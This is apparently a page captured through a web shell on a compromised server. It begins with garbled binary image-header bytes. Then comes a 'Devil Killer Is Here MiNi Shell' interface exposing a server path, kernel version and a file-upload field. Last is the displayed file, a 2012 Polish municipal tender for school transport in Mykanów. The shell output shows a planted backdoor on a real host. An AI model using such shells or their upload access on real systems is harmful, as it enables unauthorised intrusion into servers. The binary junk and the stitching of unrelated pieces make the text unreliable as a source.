JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120713/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120713/249948-N-2012.html

<p class="kh_header"><b>Mykanów: Świadczenie usług dowozu dzieci do szkół w roku szkolnym 2012/2013 w gminie Mykanów - 2 zadania</b><br>
<b>Numer ogłoszenia: 249948 - 2012; data zamieszczenia: 13.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Mykanów , ul. Samorządowa 1, 42-233 Mykanów, woj. śląskie, tel. 034 3288019, faks 034 3288019 w. 32.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług dowozu dzieci do szkół w roku szkolnym 2012/2013 w gminie Mykanów - 2 zadania.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług w zakresie dowozu dzieci do szkół podstawowych w Starym Cykarzewie,  Borownie, Czarnym Lesie, Lubojnie ,  oraz do gimnazjum w Starym Cykarzewie, Borownie, Czarnym Lesie,   oraz do przedszkoli w Starym Cykarzewie, Lubojnie , Kuźnicy Kiedrzyńskiej,  
Dowóz odbywał się będzie na trasach:
Zadanie 1 
dowóz dzieci z Lubojenki do Szkoły podstawowej w Lubojnie , oraz do Przedszkola w Lubojnie  , dowóz dzieci z Wierzchowiska, Kolonii Wierzchowiska, Florkowa, Woli Kiedrzyńskiej, Woli Hankowskiej, Antoniowa   do gimnazjum w Czarnym Lesie  ,dowóz dzieci z Lubojny, Tylina, Kuźnicy Lechowej, Kuźnicy Kiedrzyńskiej  do gimnazjum w Czarnym Lesie , dowóz dzieci z Kuźnicy Lechowej, Kuźnicy Kiedrzyńskiej do szkoły podstawowej w Czarnym Lesie ,  dzieci z Antoniowa  i  z Woli Hankowskiej  do szkoły podstawowej w Czarnym Lesie ;  dzieci z Czarnego Lasu   do przedszkola w Kuźnicy Kiedrzyńskiej   .
 
Musi być bezwzględnie przestrzegana zasada ,iż dzieci nie mogą być w trakcie dowozów  bez opieki .
Samochody ilością miejsc muszą być dostosowane do ilości przewożonych dzieci.
Podmiot realizujący zamówienie  ponosi pełną odpowiedzialność  za zapewnienie opieki dzieciom i młodzieży podczas dowozów 
Zadanie 2
-	dowóz dzieci do gimnazjum w Starym Cykarzewie (łącznie 64 dzieci ) w tym : ze Starego Broniszewa z wjazdem w ulicę Leśną do końca ,z Cykarzewa Północnego ,  z Cykarzewa Północnego Stacji, z Nowego Broniszewa, z Adamowa, z Rusinowa , Grabówki  , z Nowego Kocina, ze Starego Kocina, Przedkocina , Lemańska , Cykarzewa Północnego ul. Rumiankowa 
-	dowóz dzieci do SP w Starym Cykarzewie (łącznie 9 dzieci)  z  Grabówki  ; 13 dzieci   z Grabówki do przedszkola w Starym Cykarzewie ,
-	dowóz dzieci do SP i Gimnazjum w Borownie (łącznie 24 dzieci) z miejscowości Grabowa , w tym dzieci ze Szkoły Podstawowej  z gimnazjum  oraz  z Grabowej do Przedszkola w Borownie  oraz  z Broniszewa do gimnazjum w Borownie   

Przy dowozie dzieci z Grabowej należy przewidzieć dwa kursy rano i dwa popołudniu.
Przy dowozach do gimnazjum w Starym Cykarzewie należy dwa razy w tygodniu przewidzieć dwie duże pętle dowozów i odwozów ( Kociny łącznie z Broniszewem) .
W Grabówce należy przewidzieć wjazd w ul. Główną 
 
Warunki dotyczące wszystkich zadań:
Szczegółowy harmonogram ustalony będzie z Wykonawcą ,  którego oferta będzie wybrana.
Wykonawca  musi zagwarantować samochody sprawne technicznie gwarantujące bezpieczny dojazd dzieci do szkół.
Wykonawca  zobowiązany jest zabezpieczyć samochody dostosowane ilością miejsc pasażerskich siedzących do liczby dzieci do przewiezienia na danej trasie.
Wykonawca zobowiązany jest zabezpieczyć właściwą opiekę  dzieci i młodzieży w czasie dowozu dzieci do i ze szkół tj. do zadań oferenta należy, aby dzieci podczas dowozów  znajdowały się pod opieką osoby odpowiedzialnej za dowożone dzieci ( nie może to być kierowca) , szczególną opieką należy otaczać dzieci przedszkolne..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 60.14.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 10.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wysokość wadium.

1)	Każdy wykonawca zobowiązany jest zabezpieczyć swą ofertę wadium w wysokości:

Zadanie I : 1 200,00 zł
Zadanie II: 1 200,00zł
2)	Do oferty należy dołączyć dokument potwierdzający wniesienie wadium przez wykonawcę tzn.:
a)	oryginał lub potwierdzoną za zgodność z oryginałem kopię polecenia przelewu na konto Zamawiającego (warunek konieczny, ale nie wystarczający do stwierdzenia przez Zamawiającego terminowego wniesienia wadium za pomocą przelewu bankowego);
b)	kserokopię  dokumentu będącego każdą inną formą wadium dopuszczoną przez Zamawiającego. 

3)	Wykonawca zostanie wykluczony z niniejszego postępowania, jeżeli jego oferta przed upływem terminu składania ofert nie zostanie zabezpieczona akceptowaną przez Zamawiającego formą wadium w wymaganej wysokości.

a.	Forma wadium.

Wadium może być wniesione w następujących formach:
a)	pieniądzu;
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym ze poręczenie kasy jest zawsze poręczeniem pieniężnym;
c)	gwarancjach bankowych;
d)	gwarancjach ubezpieczeniowych;
e)	poręczeniach udzielanych przez podmioty , o których mowa w art.6b ust.5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości
W przypadku składania przez Wykonawcę wadium w formie gwarancji ,,polisy , poręczenia lub innego dokumentu, winny one zawierać stwierdzenie, że na pierwsze pisemne żądanie Zamawiającego wzywające do zaplaty kwoty wadium zgodnie z warunkami specyfikacji istotnych warunków zamówienia następuje jego bezwarunkowa wypłata bez jakichkolwiek zastrzeżeń ze strony gwaranta / poręczyciela

b.	Miejsce i sposób wniesienia wadium.

1)	Wadium wnoszone w pieniądzu należy wpłacić na następujący rachunek Zamawiającego:

08 8258 0005 2001 0000 0925 0001 w BS Mykanów

2)	Wadium wnoszone w innych dopuszczonych przez Zamawiającego formach należy  w oryginale  złożyć w kasie Urzędu Gminy  a do oferty dołączona kserokopia potwierdzona za zgodność
c.	Termin wniesienia wadium.

Wadium należy wnieść przed upływem terminu składania ofert, przy czym wniesienie wadium w pieniądzu za pomocą przelewu bankowego Zamawiający będzie uważał za skuteczne tylko wówczas, gdy  bank prowadzący rachunek Zamawiającego potwierdzi, że otrzymał taki przelew przed upływem terminu składania ofert. 

Osobą upełnomocnioną do udzielania informacji o potwierdzonych przez bank transakcjach na wymienionym rachunku jest Pani Joanna Mróz , nr telefonu (+48 034) 3288019 wew.24 , w godzinach 9.00 - 15.00.

d.	Zwrot wadium.
1). Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania,  z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza , z zastrzeżeniem sytuacji art.46 ust. 4a ustawy prawo zamówień publicznych.
Zamawiający żąda ponownego wniesienia wadium przez wykonawcę ,któremu zwrócono wadium na podstawie niniejszego punktu, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza .Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.

2)  Wykonawcy , którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego.
3)  Zamawiający zwraca niezwłocznie wadium, jeżeli: wykonawca wycofał swoją ofertę przed upływem terminu składania ofert,

Wniosek o zwrot wadium musi być podpisany przez upełnomocnionych przedstawicieli wykonawcy i złożony wraz z poświadczoną przez nich za zgodność z oryginałem kopią aktualnego dokumentu określającego status prawny wykonawcy lub poświadczoną za zgodność z oryginałem kopią stosownego pełnomocnictwa. 

Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę. Zaleca się wskazanie w ofercie nr rachunku bankowego, na który należy dokonać zwrotu.  

e.	 Utrata wadium.
Zamawiający zatrzymuje wadium wraz z odsetkami , jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art.26 ust.3, nie złożył dokumentów lub oświadczeń, o których mowa w art.25 ust.1, lub pełnomocnictw, chyba ze udowodni, że wynika to z przyczyn nieleżących po jego stronie.

Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana: 
1)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie; 
2)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
3)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.

Te cztery przypadki utraty wadium winny być wskazane  w dokumentach  wadialnych w przypadku wadium składanego w formie innej niż pieniądz.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien posiadać  licencję  na transport osób w ruchu krajowym lub  
          licencję na transport osób w ruchu międzynarodowym wydaną na podstawie ustawy o transporcie drogowym</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w okresie ostatnich 3 lat przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, Wykonawca ukończył co najmniej 1 zamówienie  w zakresie przewozu dzieci i młodzieży szkolnej ,wartość tego zamówienia dla jednego zamawiającego - co najmniej 30 000 zł  brutto rocznie za przewozy dzieci i młodzieży - ten warunek dotyczy każdego zadania oddzielnie (przy uwzględnianiu zamówień opłacanych w walucie innej niż złoty należy podać wartość przeliczoną na złote według średniego kursu NBP z dnia ukazania się ogłoszenia o niniejszym przetargu w Biuletynie Zamówień Publicznych); Składając ofertę na dwa zadania należy zrealizować co najmniej 2 zamówienia o wartości 30 000zł brutto każde.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi posiadać następujący sprzęt:
Zadanie I 
minimum 1 autobus  z ilością miejsc siedzących minimum 49 dla dzieci
zadanie II
	minimum 1 autobus  z ilością miejsc siedzących minimum 42 dla dzieci   i  minimum 1  bus  z ilością miejsc siedzących minimum  21 dla dzieci</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-Wykonawca   wskaże do wykonania niniejszego zamówienia następujące osoby 
             wraz z informacjami na temat ich kwalifikacji niezbędnych do wykonania  
            zamówienia, a także zakresu wykonywania przez nich czynności:
        I      Wykonawca winien posiadać certyfikaty kompetencji zawodowych w transporcie drogowym osób
 (1)	Kierowcy muszą posiadać aktualne uprawnienia zawodowe  - do każdego pojazdu kierowca z odpowiednimi kwalifikacjami
(2)	kadra do sprawowania opieki  nad przewożoną młodzieżą  - do każdego pojazdu musi być opiekun - dotyczy każdego zadania oddzielnie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-    posiadać ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności  będącej przedmiotem niniejszego postępowania o wartości nie niższej niż 200 000zł  ( dotyczy każdego zadania oddzielnie ) . Składając ofertę  na dwa zadania należy posiadać ubezpieczenie od odpowiedzialności cywilnej w wysokości minimum 400 000zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Do oferty należy dołączyć dokumenty potwierdzające spełnienie przez oferowane  urządzenia ( samochody )  minimalnych parametrów określonych w niniejszej siwz. Należy załączyć do oferty ksero dowodów rejestracyjnych  z aktualnymi przeglądami technicznymi.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Wypełniony i podpisany Formularz ofertowy z wykorzystaniem wzoru - załącznik nr 1- na każde zadanie  musi być oddzielna oferta 
        2) oświadczenie o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne 
            z art.22 ust.1 z wykorzystaniem wzoru - załącznik nr 2 - na każde zadanie oddzielne  
            oświadczenie
pełnomocnictwa osób podpisujących ofertę do podejmowania zobowiązań w imieniu firmy składającej ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów
W przypadku oferty składanej przez  wykonawców wspólnie należy przedstawić pełnomocnictwo w formie  oryginału lub kserokopii potwierdzonej notarialnie, zaś  każdy z podmiotów przedstawia dokumenty potwierdzające brak podstaw do wykluczenia z art. 24 ust.1 i 2 ustawy PZP</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza następujące przypadki zmian do umowy:
ZMIANY DO UMOWY :
Zamawiający dopuszcza możliwość zmiany umowy w zakresie   zmiany ceny jednostkowej brutto usługi, w przypadku zmiany  ustawowej stawki podatku od towarów i usług VAT,  a w konsekwencji    zmianę wartości   umowy  brutto.
  Wymieniona zmiana wymaga zgody obu stron umowy.
Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy Pzp: zmiana danych związanych z obsługą administracyjno-organizacyjną umowy, zmiany danych teleadresowych, zmiany osób wskazanych do kontaktów między Stronami, omyłki pisarskie .

Wszelkie zmiany i uzupełnienia umowy wymagają formy pisemnej pod rygorem nieważności za zgodą obu stron.

Wszelkie zmiany muszą być dokonywane z zachowaniem przepisu art. 140 ust. 1 ustawy Prawo zamówień publicznych (Dz. U. z 2010r. nr 113, poz.759 ze zmianami) i art.140 ust. 3 stanowiącego, że umowa podlega unieważnieniu  w części wykraczającej poza określenie przedmiotu zamówienia zawartego w Specyfikacji  Istotnych Warunków Zamówienia.
Wzór umowy stanowi załącznik do niniejszej siwz</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mykanow.4bip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Mykanowie
42-233 Mykanów 
ul. Samorządowa 1.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.07.2012 godzina 12:00, miejsce: Urząd Gminy
w Mykanowie
42-233 Mykanów
ul. Samorządowa 1
budynek A I piętro sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
